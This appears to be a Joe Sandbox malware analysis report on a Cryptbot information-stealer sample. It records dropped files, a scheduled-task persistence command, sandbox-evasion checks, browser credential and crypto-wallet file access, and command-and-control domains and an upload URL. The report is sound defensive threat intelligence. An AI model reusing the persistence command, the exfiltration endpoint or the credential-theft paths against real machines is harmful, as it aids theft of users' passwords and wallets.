Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: tmdmltzmawbreijbrymr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: tmdmltzmawbreijbrymr.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: file.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: file.exe

Static file information: File size 7457792 > 1048576

Source: file.exe	Static PE information: Raw size of .text is bigger than: 0x100000 < 0x4c5600
Source: file.exe	Static PE information: Raw size of .data is bigger than: 0x100000 < 0x1da600

Source: file.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Code function: 4_2_00538230 LoadLibraryA,GetProcAddress,FreeLibrary,GetLastError,

4_2_00538230

Source: file.exe	Static PE information: section name: .eh_fram
Source: service123.exe.0.dr	Static PE information: section name: .eh_fram
Source: TMdMlTZMAWbrEijBRYMr.dll.0.dr	Static PE information: section name: .eh_fram

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_0053A499 push es; iretd	4_2_0053A694
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C338C2A push edx; mov dword ptr [esp], ebx	4_2_6C338C3E
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C364DB0 push eax; mov dword ptr [esp], ebx	4_2_6C365018
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C344DC1 push eax; mov dword ptr [esp], ebx	4_2_6C344DD5
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C336E03 push edx; mov dword ptr [esp], ebx	4_2_6C336E17
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C344FA1 push eax; mov dword ptr [esp], ebx	4_2_6C344FB5
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C36E860 push eax; mov dword ptr [esp], ebx	4_2_6C36E98B
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C358850 push eax; mov dword ptr [esp], ebx	4_2_6C358E4F
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C340852 push eax; mov dword ptr [esp], ebx	4_2_6C340866
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C34285C push edx; mov dword ptr [esp], ebx	4_2_6C342870
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C3729A0 push eax; mov dword ptr [esp], ebx	4_2_6C372CD4
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C3729A0 push edx; mov dword ptr [esp], ebx	4_2_6C372CF3
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C3A09E0 push eax; mov dword ptr [esp], edi	4_2_6C3A0B5A
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C36EAC0 push eax; mov dword ptr [esp], ebx	4_2_6C36EBE3
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C344BE1 push eax; mov dword ptr [esp], ebx	4_2_6C344BF5
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C380460 push eax; mov dword ptr [esp], ebx	4_2_6C3807FF
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C330452 push eax; mov dword ptr [esp], ebx	4_2_6C33048A
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C348451 push 890005EAh; ret	4_2_6C348459
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C3304BE push eax; mov dword ptr [esp], ebx	4_2_6C33048A
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C3364A3 push edx; mov dword ptr [esp], ebx	4_2_6C3364B7
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C3304AD push eax; mov dword ptr [esp], ebx	4_2_6C33048A
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C33A527 push eax; mov dword ptr [esp], ebx	4_2_6C33A53B
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C311AAA push eax; mov dword ptr [esp], ebx	4_2_6C3C6622
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C311AAA push eax; mov dword ptr [esp], ebx	4_2_6C3C6622
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C33A6F7 push eax; mov dword ptr [esp], ebx	4_2_6C33A70B
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C316003 push eax; mov dword ptr [esp], ebx	4_2_6C3C6AF6
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C316003 push edx; mov dword ptr [esp], edi	4_2_6C3C6B36
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C316098 push eax; mov dword ptr [esp], ebx	4_2_6C3C6622
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C3440D5 push ecx; mov dword ptr [esp], ebx	4_2_6C3440E9
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C3381E5 push edx; mov dword ptr [esp], ebx	4_2_6C3381F9
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C33023B push eax; mov dword ptr [esp], ebx	4_2_6C330251

Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\service123.exe			Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\TMdMlTZMAWbrEijBRYMr.dll			Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking mutex)

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Evasive API call chain: CreateMutex,DecisionNodes,Sleep

graph_4-158041

Found stalling execution ending in API Sleep call

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Stalling execution: Execution stalls by calling Sleep

graph_4-158042

Source: C:\Users\user\Desktop\file.exe

Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Window / User API: threadDelayed 589

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\service123.exe

API coverage: 1.1 %

Source: C:\Users\user\Desktop\file.exe TID: 7516	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 8020	Thread sleep count: 589 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 8020	Thread sleep time: -58900s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior

Source: file.exe	Binary or memory string: VMware
Source: file.exe, 00000000.00000003.1781292878.00000000010E4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1859884995.00000000010DF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2375435758.00000000010DF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1768676819.00000000010E5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2375435758.000000000109E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Code function: 4_2_00538230 LoadLibraryA,GetProcAddress,FreeLibrary,GetLastError,

4_2_00538230

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_0053116C Sleep,Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm,GetStartupInfoA,_cexit,_initterm,exit,	4_2_0053116C
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_00531160 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,	4_2_00531160
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_005311A3 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,	4_2_005311A3
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_005313C9 SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm,	4_2_005313C9

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe"			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Code function: 4_2_6C378280 cpuid

4_2_6C378280

Source: C:\Users\user\Desktop\file.exe

Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Clipboard Hijacker

Source: Yara match	File source: 4.2.service123.exe.6c2f0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.2351645168.0000000004495000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7432, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: service123.exe PID: 8016, type: MEMORYSTR

Yara detected Cryptbot

Source: Yara match

File source: Process Memory Space: file.exe PID: 7432, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: file.exe	String found in binary or memory: Electrum
Source: file.exe	String found in binary or memory: \ElectronCash\wallets
Source: file.exe	String found in binary or memory: com.liberty.jaxx
Source: file.exe	String found in binary or memory: \Exodus\backup
Source: file.exe	String found in binary or memory: exodus
Source: file.exe	String found in binary or memory: Ethereum (UTC)

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Source: Yara match

File source: Process Memory Space: file.exe PID: 7432, type: MEMORYSTR

Remote Access Functionality

Yara detected Cryptbot

Source: Yara match

File source: Process Memory Space: file.exe PID: 7432, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	11 Process Injection	1 Masquerading	1 OS Credential Dumping	11 Security Software Discovery	Remote Services	1 Archive Collected Data	2 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	11 Native API	1 DLL Side-Loading	1 Scheduled Task/Job	2 Virtualization/Sandbox Evasion	LSASS Memory	2 Virtualization/Sandbox Evasion	Remote Desktop Protocol	2 Data from Local System	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	11 Process Injection	Security Account Manager	1 Application Window Discovery	SMB/Windows Admin Shares	2 Clipboard Data	112 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	2 File and Directory Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	3 Obfuscated Files or Information	LSA Secrets	22 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	34%	ReversingLabs	Win32.Trojan.CryptBot

Source	Detection	Scanner	Label	Link
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://gcc.gnu.org/bugs/):	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
analforeverlovyu.top	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
https://keruzam.com/update.php?compName=	0%	Virustotal		Browse
n.top	0%	Virustotal		Browse
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
sevtbv17pn.top	80.66.81.78	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
@sevtbv17pn.top	true		unknown
analforeverlovyu.top	true	URL Reputation: safe	unknown
pn.top	true		unknown
0asevtbv17pn.top	true		unknown
n.top	true	0%, Virustotal, Browse	unknown
+sevtbv17pn.top	true		unknown
sevtbv17pn.top	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://ac.ecosia.org/autocomplete?q=	file.exe, 00000000.00000003.1824507467.0000000001BE3000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
https://duckduckgo.com/chrome_newtab	file.exe, 00000000.00000003.1824507467.0000000001BE3000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
https://gcc.gnu.org/bugs/):	TMdMlTZMAWbrEijBRYMr.dll.0.dr	false	URL Reputation: safe	unknown
https://keruzam.com/update.php?compName	file.exe	false		unknown
http://sevtbv17pn.top/	file.exe, 00000000.00000003.1859870408.00000000010FA000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://duckduckgo.com/ac/?q=	file.exe, 00000000.00000003.1824507467.0000000001BE3000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	file.exe, 00000000.00000003.1824507467.0000000001BE3000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://keruzam.com/update.php?compName=	file.exe, 00000000.00000003.2374347014.000000006A364000.00000002.00001000.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	file.exe, 00000000.00000003.1824507467.0000000001BE3000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	file.exe, 00000000.00000003.1824507467.0000000001BE3000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	file.exe, 00000000.00000003.1824507467.0000000001BE3000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://sevtbv17pn.top/v1/upload.php	file.exe, 00000000.00000003.1859870408.00000000010FA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1768676819.00000000010DF000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.ecosia.org/newtab/	file.exe, 00000000.00000003.1824507467.0000000001BE3000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	file.exe, 00000000.00000003.1824507467.0000000001BE3000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
80.66.81.78	sevtbv17pn.top	Russian Federation		202984	TEAM-HOSTASRU	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1532996
Start date and time:	2024-10-14 09:14:09 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 38s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@8/2@1/1
EGA Information:	Successful, ratio: 50%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target file.exe, PID 7432 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
03:15:09	API Interceptor	3x Sleep call for process: file.exe modified
03:16:44	API Interceptor	289x Sleep call for process: service123.exe modified
08:16:10	Task Scheduler	Run new task: ServiceData4 path: C:\Users\user\AppData\Local\Temp\/service123.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
80.66.81.78	lkOawAWJRO.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	sevtvr17pt.top/v1/upload.php
	vsYkceYJOX.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, RedLine, Stealc, Vidar	Browse	sevtvr17vt.top/v1/upload.php
	nJohIBtNm5.exe	Get hash	malicious	LummaC, Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, RedLine	Browse	sevtvx17vs.top/v1/upload.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TEAM-HOSTASRU	lkOawAWJRO.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	80.66.81.78
	vsYkceYJOX.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, RedLine, Stealc, Vidar	Browse	80.66.81.78
	nJohIBtNm5.exe	Get hash	malicious	LummaC, Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, RedLine	Browse	80.66.81.78
	UpU2O6YQxG.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	80.66.81.77
	skid.mpsl.elf	Get hash	malicious	Mirai, Moobot	Browse	185.231.244.61
	Cheater Pro 1.6.0.msi	Get hash	malicious	Unknown	Browse	80.66.81.208
	Cheat Lab 2.7.2.msi	Get hash	malicious	Unknown	Browse	80.66.81.208
	5WTG6N45CH.elf	Get hash	malicious	Mirai	Browse	185.231.244.77
	124.apk	Get hash	malicious	Hook	Browse	80.66.85.141
	wCsTvggsz2.exe	Get hash	malicious	DCRat, zgRAT	Browse	46.8.29.132

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	315803136
Entropy (8bit):	0.0543661346359521
Encrypted:	false
SSDEEP:	24576:HFCE/Be//C7PeTpObC/8llm0WrFaQmWXn5EDP9wXNjKrfS2:yWWhAWXnCPeXRc
MD5:	6CF3458F05BBC4551C51F486A42C50E3
SHA1:	B50668C17009C2415ECDA15E5EA8F08BD3D43DBE
SHA-256:	917F2F431A70FC4A93588B99AF5A1D4D3CD21999A42B3C33F3493366CD7007DB
SHA-512:	89A5745ED10E2D2719AD00AE876BB740A8119DE37EC79369868A9FF41933DD7B1032F3B1C1E45D3C84A96C1495B6EB0C36308DCECF507F24A99955760C388CAA
Malicious:	false
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g...........#...(..........................Lq.........................@......CR....@... .........................`.......................................@z...........................=.........................t............................text...8...........................`..`.data...............................@....rdata..............................@..@.eh_framX...........................@..@.bss.........p...........................edata..`............:..............@..@.idata...............<..............@....CRT....,............F..............@....tls.................H..............@....reloc..@z.......\|...J..............@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\service123.exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	314617856
Entropy (8bit):	0.0023405286258548507
Encrypted:	false
SSDEEP:
MD5:	C7DE705DEE7C918329739835EB2FFF15
SHA1:	7C25B9CB916A3C14189F19F8C814253C9FC75C77
SHA-256:	C4CC692D13488E6A0234BDEEDD876B027D6B5A52494EDF7C494E7B9653E59E40
SHA-512:	B40FFF161E6869803739E181022CF97A415D9B77F0C3915E102B5DE271CBB2E83B9191C2A057F83A4474F89533779A0BA32D7B109AA4C26AF8F89808F3E90CEC
Malicious:	true
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g...............(.v........................@.......................... ......+.....@... .................................................................d...........................D.......................T................................text....t.......v..................`..`.data...T............z..............@....rdata...............\|..............@..@.eh_fram............................@..@.bss....t................................idata..............................@....CRT....0...........................@....tls................................@....reloc..d...........................@..B........................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Entropy (8bit):	5.1018163514744295
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	7'457'792 bytes
MD5:	7105a2ba8c897b6c2072a6ab0bdecdf1
SHA1:	d3659027483c2825c8430a41a0c3e439aac78e2f
SHA256:	abc53ac9f7564ceba0a7548b880b1e92c8e0329ff9680e3c5f06abcbd4e869b9
SHA512:	25dc46cf350a294ea6ce7b7d07c07bfd379307783bea9f357d20a7277fa49736221c7ba1f33afd46ef26a917ef544303291263931b239c26aa8f5abb35a92c9e
SSDEEP:	49152:w6u6AkFUy00GL2vXkEkaBdCtsRbSgVw1y0y1zTPWs8Mo1FqSiqL7ECI4chxGeO2b:wyA+UtvLgXMaBssNSgAyPzT
TLSH:	43762C71DE9B51E9C6C34EBA8045F23FB930AB009C3DC6B9DE81EB51E7A0F22D599444
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g...............(.VL...q..............pL...@..........................@r......fr...@... ............................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x4014a0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x670BEAEF [Sun Oct 13 15:44:47 2024 UTC]
TLS Callbacks:	0x401800, 0x4017b0
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	41db2083dac89343aef584a51a80b293

Entrypoint Preview

Instruction
mov dword ptr [00AB5070h], 00000001h
jmp 00007FB680C0FF76h
nop
mov dword ptr [00AB5070h], 00000000h
jmp 00007FB680C0FF66h
nop
sub esp, 1Ch
mov eax, dword ptr [esp+20h]
mov dword ptr [esp], eax
call 00007FB680C1E61Eh
cmp eax, 01h
sbb eax, eax
add esp, 1Ch
ret
nop
nop
nop
nop
nop
nop
nop
nop
push ebp
mov ebp, esp
push edi
push esi
push ebx
sub esp, 1Ch
mov dword ptr [esp], 00AA2000h
call dword ptr [00AB623Ch]
sub esp, 04h
test eax, eax
je 00007FB680C10335h
mov ebx, eax
mov dword ptr [esp], 00AA2000h
call dword ptr [00AB6270h]
mov edi, dword ptr [00AB6248h]
sub esp, 04h
mov dword ptr [00AB5028h], eax
mov dword ptr [esp+04h], 00AA2013h
mov dword ptr [esp], ebx
call edi
sub esp, 08h
mov esi, eax
mov dword ptr [esp+04h], 00AA2029h
mov dword ptr [esp], ebx
call edi
sub esp, 08h
mov dword ptr [008C7004h], eax
test esi, esi
je 00007FB680C102D3h
mov dword ptr [esp+04h], 00AB502Ch
mov dword ptr [esp], 00AB2104h
call esi
mov dword ptr [esp], 00401580h
call 00007FB680C10223h
lea esp, dword ptr [ebp-0Ch]
pop ebx
pop esi

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x6b6000	0xb78	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x6b9000	0x6a34c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x6b03a4	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x6b621c	0x1cc	.idata
